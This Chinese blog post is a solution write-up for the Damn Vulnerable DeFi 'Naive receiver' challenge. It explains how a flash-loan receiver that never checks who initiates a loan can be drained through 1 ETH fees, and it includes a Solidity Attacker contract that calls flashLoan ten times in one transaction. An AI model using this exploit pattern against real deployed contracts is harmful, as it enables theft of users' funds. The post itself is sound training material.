damn-vulnerable-defi | Naive receiver
- zach
- 更新于 2023-07-02 22:26
- 阅读 824
Challenge2-NaivereceiverNaivereceiver为了系统的学习solidity和foundry,我基于foundry测试框架重新编写damnvulnerable-defi的题解,欢迎交流和共建~🎉
Challenge #2 - Naive receiver
为了系统的学习solidity和foundry,我基于foundry测试框架重新编写damnvulnerable-defi的题解,欢迎交流和共建~🎉
合约
- NaiveReceiverLenderPool:继承IERC3156FlashLender,提供闪电贷功能
- FlashLoanReceiver:继承IERC3156FlashBorrower,用于发起闪电贷接收回调
脚本
- 部署NaiveReceiverLenderPool合约,向pool中转入1000eth,pool的闪电贷手续费为1eth
- 部署FlashLoanReceiver合约,向receiver中转入10eth
- 执行攻击脚本
- 期望receiver中的余额为0,pool中的余额为1000+10eth
题解
攻击目标是使得receiver中的余额为空,因为每次通过pool执行闪电贷都需要1eth的手续费,因此只需通过receiver向pool执行十次闪电贷即可把10eth全部通过手续费的方式转给pool
根据题目要求,尽量在一笔交易完成,因此可以编写合约在一笔交易中完成十次闪电贷
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import "../../src/naive-receiver/FlashLoanReceiver.sol";
import "../../src/naive-receiver/NaiveReceiverLenderPool.sol";
import "openzeppelin-contracts/contracts/interfaces/IERC3156FlashBorrower.sol";
contract Attacker {
constructor(address payable _pool, address payable _receiver){
NaiveReceiverLenderPool pool = NaiveReceiverLenderPool(_pool);
for(uint256 i=0; i<10; i++){
pool.flashLoan(IERC3156FlashBorrower(_receiver), address(0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE), 1, "0x");
}
}
}
本文参与登链社区写作激励计划 ,好文好收益,欢迎正在阅读的你也加入。
